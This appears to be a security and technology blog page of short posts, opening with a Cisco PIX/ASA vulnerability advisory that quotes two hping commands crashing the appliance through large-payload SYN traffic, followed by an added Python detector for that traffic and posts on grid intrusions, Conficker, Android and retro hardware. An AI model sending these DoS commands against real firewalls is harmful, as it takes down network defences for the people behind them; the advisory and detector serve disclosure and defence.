Some fairly critical issues disclosed on a very popular security product.

Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Read More Here …
An attacker can use readily available network utilities to exploit these issues.
The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 -a 10.22.1.1 10.22.1.2
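The traffic above has a distinctive shape: a high rate of SYN packets that each carry a near-MTU data payload, which a normal TCP handshake never does. The following detector is an added example, not part of the original post or of Cisco's advisory; it runs over constructed flow records (timestamp, source, destination, port, flags, payload length, as a NetFlow or packet-capture export might provide) and flags any source/destination pair that sends many large-payload SYNs within a one-second window.

```python
from collections import defaultdict

# Constructed sample records, not taken from the original post:
# (timestamp_seconds, src_ip, dst_ip, dst_port, tcp_flags, payload_bytes)
SAMPLE_RECORDS = (
    # 120 SYN packets carrying 1480 bytes of data in 1.2 s: the shape of the
    # block-exhaustion traffic described above (spoofed source 10.22.1.1)
    [(i * 0.01, "10.22.1.1", "10.22.1.2", 22, "S", 1480) for i in range(120)]
    # a normal SSH client: empty SYN, then data on the established flow
    + [(0.50, "192.0.2.10", "10.22.1.2", 22, "S", 0),
       (0.51, "192.0.2.10", "10.22.1.2", 22, "PA", 300)]
    # a few large SYNs well below the rate threshold: noisy, not a flood
    + [(j * 0.4, "198.51.100.7", "10.22.1.2", 22, "S", 1480) for j in range(5)]
)


def is_large_syn(rec, min_payload=1400):
    """A bare SYN normally carries no data; a SYN with a near-MTU payload is anomalous."""
    _, _, _, _, flags, payload = rec
    return "S" in flags and "A" not in flags and payload >= min_payload


def find_large_syn_floods(records, min_payload=1400, window_s=1.0, threshold=50):
    """Return {(src, dst, dport): peak_count} for every flow whose number of
    large-payload SYNs inside some window_s-second window reaches threshold."""
    per_flow = defaultdict(list)
    for rec in records:
        if is_large_syn(rec, min_payload):
            ts, src, dst, dport, _, _ = rec
            per_flow[(src, dst, dport)].append(ts)
    alerts = {}
    for flow, times in per_flow.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # slide the window start forward until it fits within window_s of t
            while t - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[flow] = peak
    return alerts


if __name__ == "__main__":
    for flow, n in find_large_syn_floods(SAMPLE_RECORDS).items():
        print(f"ALERT large-payload SYN flood {flow}: peak {n} packets per window")
```

Only the spoofed 10.22.1.1 flow is reported; the ordinary SSH client and the low-rate sender stay below the threshold.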

Never before has a presidential candidate used technology in the way the Obama administration did during the past elections. From YouTube to Twitter tweets sent from his trusty BlackBerry, Obama definitely leveraged his technological savvy in his favor. So then why, after more than a handful of months into his term, has he still not chosen a CTO for the nation? Is it due to a lack of competent technology folks? Maybe he feels it is not as important as, say, visiting the Tonight Show? Or maybe he wants to assume the responsibilities himself on the weekends and in his spare time? TechCrunch is running a poll on this very question, so take the time, head on over and share your input. In a world of increasing threats to our IT infrastructure you would figure this role should be filled soon…

Read More Here …

This is not the first time we have mentioned the rise of computer security related crimes or pointed out the hacking of, or weaknesses in, many critical metropolitan infrastructures. With that said, the recent hacking events first mentioned over the past weekend do again cast a big bright light on how living in our ‘digital age’ can also be our Achilles heel. Remember the East Coast Power Outage of 2007? No airports, emergency services, traffic and street lights, mobile phones, or other critical services. Now picture that on a slightly larger scale, and you begin to understand how important events like this can be, not only to us IT security folks but to society as a whole.

The intruders, who came from countries including China and Russia, were believed to be attempting to map the US electrical system and work out how it was controlled…
… Authorities investigating the intrusions have found software tools left behind that could be used to destroy infrastructure components, the senior intelligence official said. He added, “If we go to war with them, they will try to turn them on.”

Read More Here …

Really this needs no introduction more than this video can provide!

One of the first products of the Android Bounty program hosted by Androidandme, this not only blows the iPhone’s torrent (download to local storage) program out of the water but just shows the power of open source!
And to think the bounty the developer earned for this was about $90. So when you see the 2.99 price tag for the app on the market, keep this in mind.

Read more Here!

It was in 2006 that the language known as Ruby was fully accepted as a standard language. The self-described “open source programming language with a focus on simplicity and productivity” is one of the more powerful languages in use today. The folks over at Matasano Security (not affiliated with “matz”, Y. Matsumoto, the creator of Ruby) have announced the release of ‘rbkb’, or The Ruby Black Bag.

‘rbkb’ is an ever growing collection of reversing and pen-testing related ruby libraries and tools I’ve been using and evolving for a long time now.

Head on over to their site to read more.

While the concept is pretty clear, the development team is having some issues with resources ($$). You can read more about the concept, first shown in the Android Dev Challenge, at Androidandme.com. You can also show your support for the dev team by voting for them to help get some funding here.

I am pretty excited to see this project mature and release a workable version. In my opinion this would pretty much be cake for Android security, which is already ahead of the pack in this field.

As an avid user of the Google Phone, and someone who LOVES the Android OS, we have added a new section to the site: “LSYiPDT”, or Let’s see your iPhone do this. Now it would be easy to point out the obvious tasks like running background apps, cut/paste, scanning barcodes, lasting longer than 24hrs without a recharge, or not being monopolized by AT&(I will feed your private info to the US government)T. But to prevent fan-boy flamage we will try to stick with the more advanced tasks that really set Android apart from the whack…err..pack.

Those cool guys at Hack-A-Day have a fun article on how to hack your old Atari system to make it S-Video compatible, thus making it actually usable without that old TV slider switch. I think this will be a good reference for performing a similar hack on my ancient Tandy PC that I really want to see boot up again. I wonder what I can get to run on this old Tandy to make it useful again, and where I put all those old floppy disks and program cartridges?

Read More on the S-Video hack here

As posted in the “Waiting for the Worms” article below, the Conficker worm was MIA on April 1st, along with all the Gloom N Doom forecast by the IT security industry. There is an interesting article posted by SearchSecurity.com that talks not only about possible reasons for the fizzle of the worm but also about the impact these “Crying Wolf” scenarios can have on the security industry. Will we get to a point where these warnings will be ignored? Is that maybe the intention of some of these skilled attackers? How about end users who could have patched this 6 months back but still may not have until something as hyped as this? Many good questions remain to be answered.

Read More Here

Unified threat management (UTM) is a promising approach to consolidating security controls, including firewalls, intrusion prevention, anti-virus, content filtering, and reporting.

Read More Here